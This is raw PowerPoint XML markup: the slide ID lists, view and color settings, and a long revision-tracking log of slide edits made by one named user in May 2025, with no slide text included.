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4" r:id="rId1"/>
    <p:sldMasterId id="2147484312" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId53"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId54"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="456" r:id="rId3"/>
    <p:sldId id="383" r:id="rId4"/>
    <p:sldId id="448" r:id="rId5"/>
    <p:sldId id="457" r:id="rId6"/>
    <p:sldId id="403" r:id="rId7"/>
    <p:sldId id="447" r:id="rId8"/>
    <p:sldId id="432" r:id="rId9"/>
    <p:sldId id="433" r:id="rId10"/>
    <p:sldId id="356" r:id="rId11"/>
    <p:sldId id="394" r:id="rId12"/>
    <p:sldId id="352" r:id="rId13"/>
    <p:sldId id="357" r:id="rId14"/>
    <p:sldId id="358" r:id="rId15"/>
    <p:sldId id="359" r:id="rId16"/>
    <p:sldId id="360" r:id="rId17"/>
    <p:sldId id="430" r:id="rId18"/>
    <p:sldId id="361" r:id="rId19"/>
    <p:sldId id="362" r:id="rId20"/>
    <p:sldId id="363" r:id="rId21"/>
    <p:sldId id="364" r:id="rId22"/>
    <p:sldId id="365" r:id="rId23"/>
    <p:sldId id="366" r:id="rId24"/>
    <p:sldId id="367" r:id="rId25"/>
    <p:sldId id="426" r:id="rId26"/>
    <p:sldId id="431" r:id="rId27"/>
    <p:sldId id="368" r:id="rId28"/>
    <p:sldId id="369" r:id="rId29"/>
    <p:sldId id="370" r:id="rId30"/>
    <p:sldId id="371" r:id="rId31"/>
    <p:sldId id="374" r:id="rId32"/>
    <p:sldId id="461" r:id="rId33"/>
    <p:sldId id="377" r:id="rId34"/>
    <p:sldId id="409" r:id="rId35"/>
    <p:sldId id="378" r:id="rId36"/>
    <p:sldId id="411" r:id="rId37"/>
    <p:sldId id="382" r:id="rId38"/>
    <p:sldId id="458" r:id="rId39"/>
    <p:sldId id="459" r:id="rId40"/>
    <p:sldId id="408" r:id="rId41"/>
    <p:sldId id="414" r:id="rId42"/>
    <p:sldId id="412" r:id="rId43"/>
    <p:sldId id="460" r:id="rId44"/>
    <p:sldId id="386" r:id="rId45"/>
    <p:sldId id="423" r:id="rId46"/>
    <p:sldId id="404" r:id="rId47"/>
    <p:sldId id="405" r:id="rId48"/>
    <p:sldId id="428" r:id="rId49"/>
    <p:sldId id="427" r:id="rId50"/>
    <p:sldId id="429" r:id="rId51"/>
    <p:sldId id="387" r:id="rId52"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7099300" cy="10234613"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="sr-Latn-C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0"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E9FB43"/>
    <a:srgbClr val="7FA8B8"/>
    <a:srgbClr val="50ACC5"/>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94CC6F-7049-4850-A6F7-B103CDA45901}" v="15" dt="2025-05-13T10:59:02.208"/>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4660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="114" d="100"/>
          <a:sy n="114" d="100"/>
        </p:scale>
        <p:origin x="972" y="9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žen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:59:02.208" v="248"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4109782653" sldId="352"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4109782653" sldId="352"/>
            <ac:spMk id="27650" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4109782653" sldId="352"/>
            <ac:spMk id="27651"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56"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="356"/>
            <ac:spMk id="21506" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="356"/>
            <ac:spMk id="21507"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57"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="357"/>
            <ac:spMk id="22530" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="357"/>
            <ac:spMk id="22531"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58"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="358"/>
            <ac:spMk id="23554" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="358"/>
            <ac:spMk id="33794"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59"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="359"/>
            <ac:spMk id="24578" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="359"/>
            <ac:spMk id="34818"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60"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="360"/>
            <ac:spMk id="25602" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="360"/>
            <ac:spMk id="35842"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61"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="361"/>
            <ac:spMk id="26626" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="361"/>
            <ac:spMk id="36866"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62"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="362"/>
            <ac:spMk id="27650" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="362"/>
            <ac:spMk id="27651"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63"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="363"/>
            <ac:spMk id="28674" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="363"/>
            <ac:spMk id="28675"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64"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="364"/>
            <ac:spMk id="29698" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="364"/>
            <ac:spMk id="29699"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65"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="365"/>
            <ac:spMk id="30722" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="365"/>
            <ac:spMk id="30723"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66"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="366"/>
            <ac:spMk id="31746" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="366"/>
            <ac:spMk id="31747"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67"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="367"/>
            <ac:spMk id="32770" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="367"/>
            <ac:spMk id="43010"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68"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="368"/>
            <ac:spMk id="33794" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="368"/>
            <ac:spMk id="44034"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69"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="369"/>
            <ac:spMk id="34818" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="369"/>
            <ac:spMk id="34819" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="370"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="370"/>
            <ac:spMk id="2" creationId="{7BA5F97F-624D-ABF4-9D02-B73C37C88878}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="370"/>
            <ac:spMk id="3" creationId="{C645FF73-4516-46D0-833F-BDD174408BB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="370"/>
            <ac:spMk id="35842"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71"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="371"/>
            <ac:spMk id="36866" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="371"/>
            <ac:spMk id="47106"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74"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="374"/>
            <ac:spMk id="39938" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="374"/>
            <ac:spMk id="39939"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77"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="377"/>
            <ac:spMk id="43010" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="377"/>
            <ac:spMk id="53250"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512003390" sldId="378"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="512003390" sldId="378"/>
            <ac:spMk id="45058" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="512003390" sldId="378"/>
            <ac:spMk id="55298" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:35.673" v="6" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3757872968" sldId="379"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:57.983" v="80" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="382"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:34.835" v="74" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="382"/>
            <ac:spMk id="2" creationId="{804A1995-F1EF-3043-79BD-22371CE3E5E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:38.258" v="75" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="382"/>
            <ac:spMk id="3" creationId="{78C39F92-4D2E-971F-9A51-E7C253446C3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:50.252" v="78" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="382"/>
            <ac:spMk id="4" creationId="{78C39F92-4D2E-971F-9A51-E7C253446C3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:57.983" v="80" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="382"/>
            <ac:picMk id="5" creationId="{99458A02-4A14-927D-A317-3934DCC5F340}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T20:01:39.956" v="76" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="382"/>
            <ac:picMk id="1026" creationId="{435E1042-53ED-033A-7C4F-53BF4BACFA3D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="383"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="383"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="383"/>
            <ac:spMk id="15363" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modClrScheme chgLayout">
        <pc:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:52:16.248" v="228" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="386"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-12T19:32:29.284" v="5" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="386"/>
            <ac:spMk id="47106" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Dražen Pranić" userId="3012855b-bf2d-4e7c-804b-71a5f3d907b3" providerId="ADAL" clId="{6294CC6F-7049-4850-A6F7-B103CDA45901}" dt="2025-05-13T10:52:16.248" v="228" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="386"/>
            <ac:spMk id="60418"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0" sldId="387"/>
        </pc:sldMkLst>
